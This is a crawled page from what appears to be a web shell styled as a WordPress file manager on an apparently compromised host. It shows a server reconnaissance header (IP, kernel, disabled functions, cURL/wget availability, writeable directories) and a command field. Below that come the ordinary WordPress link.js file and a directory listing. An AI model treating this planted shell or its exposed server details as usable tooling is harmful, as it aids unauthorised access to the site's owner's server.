GRAYBYTE WORDPRESS FILE MANAGER3478

Server IP : 68.65.123.43 / Your IP : 216.73.216.162
System : Linux server266.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/inteuuod/ai.internsifyafrica.com/wp-admin/js/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/inteuuod/ai.internsifyafrica.com/wp-admin/js//link.js
/**
 * @output wp-admin/js/link.js
 */

/* global postboxes, deleteUserSetting, setUserSetting, getUserSetting */

jQuery( function($) {

	var newCat, noSyncChecks = false, syncChecks, catAddAfter;

	$('#link_name').trigger( 'focus' );
	// Postboxes.
	postboxes.add_postbox_toggles('link');

	/**
	 * Adds event that opens a particular category tab.
	 *
	 * @ignore
	 *
	 * @return {boolean} Always returns false to prevent the default behavior.
	 */
	$('#category-tabs a').on( 'click', function(){
		var t = $(this).attr('href');
		$(this).parent().addClass('tabs').siblings('li').removeClass('tabs');
		$('.tabs-panel').hide();
		$(t).show();
		if ( '#categories-all' == t )
			deleteUserSetting('cats');
		else
			setUserSetting('cats','pop');
		return false;
	});
	if ( getUserSetting('cats') )
		$('#category-tabs a[href="#categories-pop"]').trigger( 'click' );

	// Ajax Cat.
	newCat = $('#newcat').one( 'focus', function() { $(this).val( '' ).removeClass( 'form-input-tip' ); } );

	/**
	 * After adding a new category, focus on the category add input field.
	 *
	 * @return {void}
	 */
	$('#link-category-add-submit').on( 'click', function() { newCat.focus(); } );

	/**
	 * Synchronize category checkboxes.
	 *
	 * This function makes sure that the checkboxes are synced between the all
	 * categories tab and the most used categories tab.
	 *
	 * @since 2.5.0
	 *
	 * @return {void}
	 */
	syncChecks = function() {
		if ( noSyncChecks )
			return;
		noSyncChecks = true;
		var th = $(this), c = th.is(':checked'), id = th.val().toString();
		$('#in-link-category-' + id + ', #in-popular-link_category-' + id).prop( 'checked', c );
		noSyncChecks = false;
	};

	/**
	 * Adds event listeners to an added category.
	 *
	 * This is run on the addAfter event to make sure the correct event listeners
	 * are bound to the DOM elements.
	 *
	 * @since 2.5.0
	 *
	 * @param {string} r Raw XML response returned from the server after adding a
	 *                   category.
	 * @param {Object} s List manager configuration object; settings for the Ajax
	 *                   request.
	 *
	 * @return {void}
	 */
	catAddAfter = function( r, s ) {
		$(s.what + ' response_data', r).each( function() {
			var t = $($(this).text());
			t.find( 'label' ).each( function() {
				var th = $(this),
					val = th.find('input').val(),
					id = th.find('input')[0].id,
					name = th.text().trim(),
					o;
				$('#' + id).on( 'change', syncChecks );
				o = $( '<option value="' +  parseInt( val, 10 ) + '"></option>' ).text( name );
			} );
		} );
	};

	/*
	 * Instantiates the list manager.
	 *
	 * @see js/_enqueues/lib/lists.js
	 */
	$('#categorychecklist').wpList( {
		// CSS class name for alternate styling.
		alt: '',

		// The type of list.
		what: 'link-category',

		// ID of the element the parsed Ajax response will be stored in.
		response: 'category-ajax-response',

		// Callback that's run after an item got added to the list.
		addAfter: catAddAfter
	} );

	// All categories is the default tab, so we delete the user setting.
	$('a[href="#categories-all"]').on( 'click', function(){deleteUserSetting('cats');});

	// Set a preference for the popular categories to cookies.
	$('a[href="#categories-pop"]').on( 'click', function(){setUserSetting('cats','pop');});

	if ( 'pop' == getUserSetting('cats') )
		$('a[href="#categories-pop"]').trigger( 'click' );

	/**
	 * Adds event handler that shows the interface controls to add a new category.
	 *
	 * @ignore
	 *
	 * @param {Event} event The event object.
	 * @return {boolean} Always returns false to prevent regular link
	 *                   functionality.
	 */
	$('#category-add-toggle').on( 'click', function() {
		$(this).parents('div:first').toggleClass( 'wp-hidden-children' );
		$('#category-tabs a[href="#categories-all"]').trigger( 'click' );
		$('#newcategory').trigger( 'focus' );
		return false;
	} );

	$('.categorychecklist :checkbox').on( 'change', syncChecks ).filter( ':checked' ).trigger( 'change' );
});

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 13 2025 02:32:41
inteuuod / inteuuod
0755
widgets
--
July 11 2025 00:52:32
inteuuod / inteuuod
0755
.htaccess
0.124 KB
July 11 2025 00:52:32
inteuuod / inteuuod
0444
accordion.js
2.869 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
accordion.min.js
0.829 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
application-passwords.js
6.244 KB
September 18 2023 08:21:24
inteuuod / inteuuod
0644
application-passwords.min.js
2.953 KB
September 18 2023 08:21:24
inteuuod / inteuuod
0644
auth-app.js
5.66 KB
February 24 2021 06:15:04
inteuuod / inteuuod
0644
auth-app.min.js
2.035 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
code-editor.js
11.316 KB
July 28 2020 09:05:02
inteuuod / inteuuod
0644
code-editor.min.js
3.011 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
color-picker.js
9.539 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
color-picker.min.js
3.404 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
comment.js
2.851 KB
February 12 2024 05:44:20
inteuuod / inteuuod
0644
comment.min.js
1.284 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
common.js
58.391 KB
March 01 2024 08:32:16
inteuuod / inteuuod
0644
common.min.js
21.757 KB
March 01 2024 08:32:16
inteuuod / inteuuod
0644
custom-background.js
3.354 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
custom-background.min.js
1.178 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
custom-header.js
1.976 KB
February 24 2021 06:15:04
inteuuod / inteuuod
0644
customize-controls.js
286.463 KB
January 10 2024 21:43:20
inteuuod / inteuuod
0644
customize-controls.min.js
108.973 KB
January 10 2024 21:43:20
inteuuod / inteuuod
0644
customize-nav-menus.js
106.318 KB
March 02 2024 02:51:10
inteuuod / inteuuod
0644
customize-nav-menus.min.js
44.761 KB
March 02 2024 02:51:10
inteuuod / inteuuod
0644
customize-widgets.js
70.023 KB
April 26 2022 16:24:10
inteuuod / inteuuod
0644
customize-widgets.min.js
27.398 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
dashboard.js
26.923 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
dashboard.min.js
8.591 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
edit-comments.js
36.65 KB
September 28 2022 02:36:10
inteuuod / inteuuod
0644
edit-comments.min.js
14.989 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
editor-expand.js
41.608 KB
September 09 2021 08:59:58
inteuuod / inteuuod
0644
editor-expand.min.js
13.136 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
editor.js
44.254 KB
September 09 2021 08:59:58
inteuuod / inteuuod
0644
editor.min.js
12.866 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
farbtastic.js
7.665 KB
July 18 2023 07:33:26
inteuuod / inteuuod
0644
gallery.js
5.413 KB
October 10 2023 07:01:28
inteuuod / inteuuod
0644
gallery.min.js
3.653 KB
October 10 2023 07:01:28
inteuuod / inteuuod
0644
image-edit.js
38.205 KB
September 22 2023 03:34:16
inteuuod / inteuuod
0644
image-edit.min.js
14.296 KB
September 22 2023 03:34:16
inteuuod / inteuuod
0644
inline-edit-post.js
19.803 KB
March 01 2024 08:32:16
inteuuod / inteuuod
0644
inline-edit-post.min.js
9.271 KB
March 01 2024 08:32:16
inteuuod / inteuuod
0644
inline-edit-tax.js
7.614 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
inline-edit-tax.min.js
2.927 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
iris.min.js
23.089 KB
November 04 2021 05:10:00
inteuuod / inteuuod
0644
language-chooser.js
0.869 KB
February 24 2021 06:15:04
inteuuod / inteuuod
0644
language-chooser.min.js
0.413 KB
February 24 2021 06:15:04
inteuuod / inteuuod
0644
link.js
3.894 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
link.min.js
1.701 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
media-gallery.js
1.272 KB
February 24 2021 06:15:04
inteuuod / inteuuod
0644
media-gallery.min.js
0.597 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
media-upload.js
3.384 KB
January 22 2021 23:02:04
inteuuod / inteuuod
0644
media-upload.min.js
1.125 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
media.js
6.261 KB
December 29 2023 01:57:16
inteuuod / inteuuod
0644
media.min.js
2.341 KB
December 29 2023 01:57:16
inteuuod / inteuuod
0644
nav-menu.js
50.089 KB
November 18 2022 04:45:20
inteuuod / inteuuod
0644
nav-menu.min.js
25.349 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
password-strength-meter.js
4.137 KB
January 22 2021 23:02:04
inteuuod / inteuuod
0644
password-strength-meter.min.js
1.097 KB
January 22 2021 23:02:04
inteuuod / inteuuod
0644
password-toggle.js
1.308 KB
June 24 2023 08:39:30
inteuuod / inteuuod
0644
password-toggle.min.js
0.827 KB
June 24 2023 08:39:30
inteuuod / inteuuod
0644
plugin-install.js
6.92 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
plugin-install.min.js
2.347 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
post.js
39.079 KB
February 12 2024 05:44:20
inteuuod / inteuuod
0644
post.min.js
18.595 KB
December 29 2023 01:57:16
inteuuod / inteuuod
0644
postbox.js
18.397 KB
January 10 2023 20:00:14
inteuuod / inteuuod
0644
postbox.min.js
6.548 KB
September 24 2022 05:25:30
inteuuod / inteuuod
0644
privacy-tools.js
10.654 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
privacy-tools.min.js
5.021 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
revisions.js
33.125 KB
January 29 2020 11:07:04
inteuuod / inteuuod
0644
revisions.min.js
17.448 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
set-post-thumbnail.js
0.855 KB
July 08 2020 04:25:04
inteuuod / inteuuod
0644
set-post-thumbnail.min.js
0.605 KB
July 08 2020 04:25:04
inteuuod / inteuuod
0644
site-health.js
13.149 KB
December 29 2023 01:57:16
inteuuod / inteuuod
0644
site-health.min.js
6.135 KB
December 29 2023 01:57:16
inteuuod / inteuuod
0644
site-icon.js
5.914 KB
February 27 2024 06:48:10
inteuuod / inteuuod
0644
site-icon.min.js
2.124 KB
February 27 2024 06:48:10
inteuuod / inteuuod
0644
svg-painter.js
5.393 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
svg-painter.min.js
2.332 KB
April 09 2022 05:37:18
inteuuod / inteuuod
0644
tags-box.js
10.879 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
tags-box.min.js
3.005 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
tags-suggest.js
5.636 KB
February 19 2024 08:46:14
inteuuod / inteuuod
0644
tags-suggest.min.js
2.216 KB
February 19 2024 08:46:14
inteuuod / inteuuod
0644
tags.js
4.773 KB
April 13 2022 05:07:14
inteuuod / inteuuod
0644
tags.min.js
1.965 KB
April 13 2022 05:07:14
inteuuod / inteuuod
0644
theme-plugin-editor.js
24.791 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
theme-plugin-editor.min.js
11.46 KB
September 24 2022 05:25:30
inteuuod / inteuuod
0644
theme.js
54.674 KB
January 04 2024 08:29:20
inteuuod / inteuuod
0644
theme.min.js
26.421 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
updates.js
107.593 KB
May 31 2024 02:56:14
inteuuod / inteuuod
0644
updates.min.js
46.811 KB
May 31 2024 02:56:14
inteuuod / inteuuod
0644
user-profile.js
13.775 KB
February 23 2024 21:08:14
inteuuod / inteuuod
0644
user-profile.min.js
6.129 KB
June 22 2023 10:02:22
inteuuod / inteuuod
0644
user-suggest.js
2.247 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
user-suggest.min.js
0.66 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
widgets.js
22.557 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
widgets.min.js
12.313 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
word-count.js
7.516 KB
July 28 2020 09:05:02
inteuuod / inteuuod
0644
word-count.min.js
1.494 KB
February 03 2023 03:06:32
inteuuod / inteuuod
0644
xfn.js
0.723 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644
xfn.min.js
0.447 KB
March 19 2021 04:31:04
inteuuod / inteuuod
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF